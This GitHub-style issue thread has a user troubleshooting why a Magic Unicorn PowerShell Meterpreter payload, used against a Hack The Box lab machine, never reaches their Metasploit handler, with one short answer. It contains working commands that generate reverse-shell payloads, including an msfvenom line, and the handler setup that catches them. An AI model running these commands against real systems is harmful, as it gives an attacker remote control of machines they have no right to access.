No meterpreter being caught by handler

Question

No meterpreter being caught by handler

Closed this issue 6 months ago · 1 comments

Magic Unicorn Attack Vector v3.12

$ msfconsole -v
Framework Version: 6.2.32-dev

Command used:
/usr/share/unicorn-magic/unicorn.py windows/meterpreter/reverse_tcp 10.10.14.101 31337

I've attached my powershell_attack.txt and unicorn.rc

I start up a handler with msfconsole -r unicorn.rc

[*] Processing unicorn.rc for ERB directives.
resource (unicorn.rc)> use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (unicorn.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (unicorn.rc)> set LHOST 10.10.14.101
LHOST => 10.10.14.101
resource (unicorn.rc)> set LPORT 31337
LPORT => 31337
resource (unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (unicorn.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (unicorn.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.101:31337

I then copy and paste either command from powershell_attack.txt on the victim machine (Arctic from HTB Microsoft Windows [Version 6.1.7600]) and nothing happens.

I then tested with msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.101 LPORT=31337 -f exe > arctic.exe and uploaded that and executed and caught a meterpreter with the handler so I know that it is listening in the right place.

powershell_attack.txt
unicorn.rc.txt

Answer 1 · 2023-07-22T04:11:01.000Z

try powershell -version 2 and then paste just the payload.